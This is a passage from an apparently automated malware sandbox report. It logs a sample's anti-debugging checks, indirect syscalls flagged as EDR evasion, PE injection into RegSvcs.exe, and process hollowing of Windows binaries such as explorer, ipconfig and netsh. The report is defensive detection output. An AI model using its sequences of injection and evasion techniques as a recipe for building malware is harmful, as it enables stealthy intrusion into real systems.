              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0173A8E4 mov eax, dword ptr fs:[00000030h]15_2_0173A8E4
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0169E8C0 mov eax, dword ptr fs:[00000030h]15_2_0169E8C0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01670887 mov eax, dword ptr fs:[00000030h]15_2_01670887
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016FC89D mov eax, dword ptr fs:[00000030h]15_2_016FC89D
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0166CB7E mov eax, dword ptr fs:[00000030h]15_2_0166CB7E
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0171EB50 mov eax, dword ptr fs:[00000030h]15_2_0171EB50
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01706B40 mov eax, dword ptr fs:[00000030h]15_2_01706B40
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01706B40 mov eax, dword ptr fs:[00000030h]15_2_01706B40
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0173AB40 mov eax, dword ptr fs:[00000030h]15_2_0173AB40
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01718B42 mov eax, dword ptr fs:[00000030h]15_2_01718B42
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0169EB20 mov eax, dword ptr fs:[00000030h]15_2_0169EB20
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0169EB20 mov eax, dword ptr fs:[00000030h]15_2_0169EB20
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01738B28 mov eax, dword ptr fs:[00000030h]15_2_01738B28
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01738B28 mov eax, dword ptr fs:[00000030h]15_2_01738B28
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016EEB1D mov eax, dword ptr fs:[00000030h]15_2_016EEB1D
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016EEB1D mov eax, dword ptr fs:[00000030h]15_2_016EEB1D
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016EEB1D mov eax, dword ptr fs:[00000030h]15_2_016EEB1D
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016EEB1D mov eax, dword ptr fs:[00000030h]15_2_016EEB1D
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016EEB1D mov eax, dword ptr fs:[00000030h]15_2_016EEB1D
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016EEB1D mov eax, dword ptr fs:[00000030h]15_2_016EEB1D
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016EEB1D mov eax, dword ptr fs:[00000030h]15_2_016EEB1D
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016EEB1D mov eax, dword ptr fs:[00000030h]15_2_016EEB1D
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016EEB1D mov eax, dword ptr fs:[00000030h]15_2_016EEB1D
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0169EBFC mov eax, dword ptr fs:[00000030h]15_2_0169EBFC
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01678BF0 mov eax, dword ptr fs:[00000030h]15_2_01678BF0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01678BF0 mov eax, dword ptr fs:[00000030h]15_2_01678BF0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01678BF0 mov eax, dword ptr fs:[00000030h]15_2_01678BF0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016FCBF0 mov eax, dword ptr fs:[00000030h]15_2_016FCBF0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0171EBD0 mov eax, dword ptr fs:[00000030h]15_2_0171EBD0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01690BCB mov eax, dword ptr fs:[00000030h]15_2_01690BCB
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01690BCB mov eax, dword ptr fs:[00000030h]15_2_01690BCB
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01690BCB mov eax, dword ptr fs:[00000030h]15_2_01690BCB
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01670BCD mov eax, dword ptr fs:[00000030h]15_2_01670BCD
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01670BCD mov eax, dword ptr fs:[00000030h]15_2_01670BCD
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01670BCD mov eax, dword ptr fs:[00000030h]15_2_01670BCD
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01680BBE mov eax, dword ptr fs:[00000030h]15_2_01680BBE
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01680BBE mov eax, dword ptr fs:[00000030h]15_2_01680BBE
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016ACA6F mov eax, dword ptr fs:[00000030h]15_2_016ACA6F
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016ACA6F mov eax, dword ptr fs:[00000030h]15_2_016ACA6F
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016ACA6F mov eax, dword ptr fs:[00000030h]15_2_016ACA6F
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0171EA60 mov eax, dword ptr fs:[00000030h]15_2_0171EA60
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016ECA72 mov eax, dword ptr fs:[00000030h]15_2_016ECA72
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016ECA72 mov eax, dword ptr fs:[00000030h]15_2_016ECA72
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01680A5B mov eax, dword ptr fs:[00000030h]15_2_01680A5B
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01680A5B mov eax, dword ptr fs:[00000030h]15_2_01680A5B
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01676A50 mov eax, dword ptr fs:[00000030h]15_2_01676A50
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01676A50 mov eax, dword ptr fs:[00000030h]15_2_01676A50
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01676A50 mov eax, dword ptr fs:[00000030h]15_2_01676A50
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01676A50 mov eax, dword ptr fs:[00000030h]15_2_01676A50
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01676A50 mov eax, dword ptr fs:[00000030h]15_2_01676A50
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01676A50 mov eax, dword ptr fs:[00000030h]15_2_01676A50
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01676A50 mov eax, dword ptr fs:[00000030h]15_2_01676A50
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0169EA2E mov eax, dword ptr fs:[00000030h]15_2_0169EA2E
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016ACA24 mov eax, dword ptr fs:[00000030h]15_2_016ACA24
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016ACA38 mov eax, dword ptr fs:[00000030h]15_2_016ACA38
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01694A35 mov eax, dword ptr fs:[00000030h]15_2_01694A35
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01694A35 mov eax, dword ptr fs:[00000030h]15_2_01694A35
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016FCA11 mov eax, dword ptr fs:[00000030h]15_2_016FCA11
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016AAAEE mov eax, dword ptr fs:[00000030h]15_2_016AAAEE
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016AAAEE mov eax, dword ptr fs:[00000030h]15_2_016AAAEE
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016C6ACC mov eax, dword ptr fs:[00000030h]15_2_016C6ACC
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016C6ACC mov eax, dword ptr fs:[00000030h]15_2_016C6ACC
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016C6ACC mov eax, dword ptr fs:[00000030h]15_2_016C6ACC
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01670AD0 mov eax, dword ptr fs:[00000030h]15_2_01670AD0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016A4AD0 mov eax, dword ptr fs:[00000030h]15_2_016A4AD0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016A4AD0 mov eax, dword ptr fs:[00000030h]15_2_016A4AD0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01678AA0 mov eax, dword ptr fs:[00000030h]15_2_01678AA0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01678AA0 mov eax, dword ptr fs:[00000030h]15_2_01678AA0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016C6AA4 mov eax, dword ptr fs:[00000030h]15_2_016C6AA4
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0167EA80 mov eax, dword ptr fs:[00000030h]15_2_0167EA80
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0167EA80 mov eax, dword ptr fs:[00000030h]15_2_0167EA80
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0167EA80 mov eax, dword ptr fs:[00000030h]15_2_0167EA80
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0167EA80 mov eax, dword ptr fs:[00000030h]15_2_0167EA80
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0167EA80 mov eax, dword ptr fs:[00000030h]15_2_0167EA80
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0167EA80 mov eax, dword ptr fs:[00000030h]15_2_0167EA80
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0167EA80 mov eax, dword ptr fs:[00000030h]15_2_0167EA80
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0167EA80 mov eax, dword ptr fs:[00000030h]15_2_0167EA80
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0167EA80 mov eax, dword ptr fs:[00000030h]15_2_0167EA80
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01744A80 mov eax, dword ptr fs:[00000030h]15_2_01744A80
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016A8A90 mov edx, dword ptr fs:[00000030h]15_2_016A8A90
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01708D6B mov eax, dword ptr fs:[00000030h]15_2_01708D6B
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01670D59 mov eax, dword ptr fs:[00000030h]15_2_01670D59
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01670D59 mov eax, dword ptr fs:[00000030h]15_2_01670D59
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01670D59 mov eax, dword ptr fs:[00000030h]15_2_01670D59
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01678D59 mov eax, dword ptr fs:[00000030h]15_2_01678D59
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01678D59 mov eax, dword ptr fs:[00000030h]15_2_01678D59
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01678D59 mov eax, dword ptr fs:[00000030h]15_2_01678D59
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01678D59 mov eax, dword ptr fs:[00000030h]15_2_01678D59
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01678D59 mov eax, dword ptr fs:[00000030h]15_2_01678D59
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016F8D20 mov eax, dword ptr fs:[00000030h]15_2_016F8D20
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01728D10 mov eax, dword ptr fs:[00000030h]15_2_01728D10
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01728D10 mov eax, dword ptr fs:[00000030h]15_2_01728D10
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0168AD00 mov eax, dword ptr fs:[00000030h]15_2_0168AD00
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0168AD00 mov eax, dword ptr fs:[00000030h]15_2_0168AD00
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0168AD00 mov eax, dword ptr fs:[00000030h]15_2_0168AD00
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01666D10 mov eax, dword ptr fs:[00000030h]15_2_01666D10
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01666D10 mov eax, dword ptr fs:[00000030h]15_2_01666D10
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01666D10 mov eax, dword ptr fs:[00000030h]15_2_01666D10
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016A4D1D mov eax, dword ptr fs:[00000030h]15_2_016A4D1D
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01710DF0 mov eax, dword ptr fs:[00000030h]15_2_01710DF0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01710DF0 mov eax, dword ptr fs:[00000030h]15_2_01710DF0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0167ADE0 mov eax, dword ptr fs:[00000030h]15_2_0167ADE0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0167ADE0 mov eax, dword ptr fs:[00000030h]15_2_0167ADE0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0167ADE0 mov eax, dword ptr fs:[00000030h]15_2_0167ADE0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0167ADE0 mov eax, dword ptr fs:[00000030h]15_2_0167ADE0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0167ADE0 mov eax, dword ptr fs:[00000030h]15_2_0167ADE0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0167ADE0 mov eax, dword ptr fs:[00000030h]15_2_0167ADE0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01690DE1 mov eax, dword ptr fs:[00000030h]15_2_01690DE1
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0166CDEA mov eax, dword ptr fs:[00000030h]15_2_0166CDEA
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeCode function: 0_2_00A52CE0 GetProcessHeap,0_2_00A52CE0
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeCode function: 0_2_00A46878 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00A46878
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeCode function: 0_2_00A4AAC4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00A4AAC4
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeCode function: 0_2_00A46A0B SetUnhandledExceptionFilter,0_2_00A46A0B
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeCode function: 0_2_00A45BBF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00A45BBF
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_005629B2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_005629B2
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_00550BCF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00550BCF
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_00550D65 SetUnhandledExceptionFilter,8_2_00550D65
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_00550FB1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_00550FB1

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Allocates memory in foreign processes
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscMemory allocated: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscMemory allocated: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeMemory allocated: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 400000 protect: page execute and read and write
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeMemory allocated: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 400000 protect: page execute and read and write
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeMemory allocated: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 400000 protect: page execute and read and write
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeMemory allocated: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 400000 protect: page execute and read and write
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeMemory allocated: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 400000 protect: page execute and read and write
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeMemory allocated: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 400000 protect: page execute and read and write
              Found direct / indirect Syscall (likely to bypass EDR)
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeNtQueueApcThread: Indirect: 0x1AFA4F2Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeNtClose: Indirect: 0x16EA56C
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeNtQueueApcThread: Indirect: 0x172A4F2
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeNtClose: Indirect: 0x1AFA56C
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeNtClose: Indirect: 0x17FA56C
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeNtClose: Indirect: 0x145A56C
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeNtClose: Indirect: 0x172A56C
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeNtQueueApcThread: Indirect: 0x145A4F2
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeNtClose: Indirect: 0x18AA56C
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeNtQueueApcThread: Indirect: 0x18AA4F2Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeNtClose: Indirect: 0x1C5A56C
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeNtClose: Indirect: 0x14BA56C
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeNtQueueApcThread: Indirect: 0x1C5A4F2
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeNtQueueApcThread: Indirect: 0x14BA4F2
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeNtQueueApcThread: Indirect: 0x14EA4F2
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeNtClose: Indirect: 0x14EA56C
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeNtQueueApcThread: Indirect: 0x17FA4F2
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeNtQueueApcThread: Indirect: 0x16EA4F2
              Injects a PE file into a foreign processes
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscMemory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscMemory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeMemory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 400000 value starts with: 4D5A
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeMemory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 400000 value starts with: 4D5A
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeMemory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 400000 value starts with: 4D5A
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeMemory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 400000 value starts with: 4D5A
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeMemory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 400000 value starts with: 4D5A
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeMemory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 400000 value starts with: 4D5A
              Maps a DLL or memory area into another process
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeSection loaded: NULL target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and writeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeSection loaded: NULL target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and writeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeSection loaded: NULL target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and writeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeSection loaded: NULL target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
              Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeSection loaded: NULL target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeSection loaded: NULL target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeSection loaded: NULL target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeSection loaded: NULL target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeSection loaded: NULL target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeSection loaded: NULL target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
              Modifies the context of a thread in another process (thread injection)
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread register set: target process: 4084Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread register set: target process: 4084Jump to behavior
              Source: C:\Windows\SysWOW64\ipconfig.exeThread register set: target process: 4084Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread register set: target process: 4084
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread register set: target process: 4084
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread register set: target process: 4084
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread register set: target process: 4084
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread register set: target process: 4084
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread register set: target process: 4084
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread register set: target process: 4084
              Queues an APC in another process (thread injection)
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
              Sample uses process hollowing technique
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeSection unmapped: C:\Windows\SysWOW64\ipconfig.exe base address: A70000Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeSection unmapped: C:\Windows\SysWOW64\rundll32.exe base address: D80000Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeSection unmapped: C:\Windows\SysWOW64\netsh.exe base address: 15C0000
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeSection unmapped: C:\Windows\SysWOW64\netsh.exe base address: 15C0000
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeSection unmapped: C:\Windows\SysWOW64\cmmon32.exe base address: 790000
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeSection unmapped: C:\Windows\SysWOW64\cmmon32.exe base address: 790000
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeSection unmapped: C:\Windows\SysWOW64\control.exe base address: 950000
              Writes to foreign memory regions
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscMemory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 400000Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscMemory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 401000Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscMemory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 10D4008Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscMemory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 400000Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscMemory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: E95000Jump to behavior
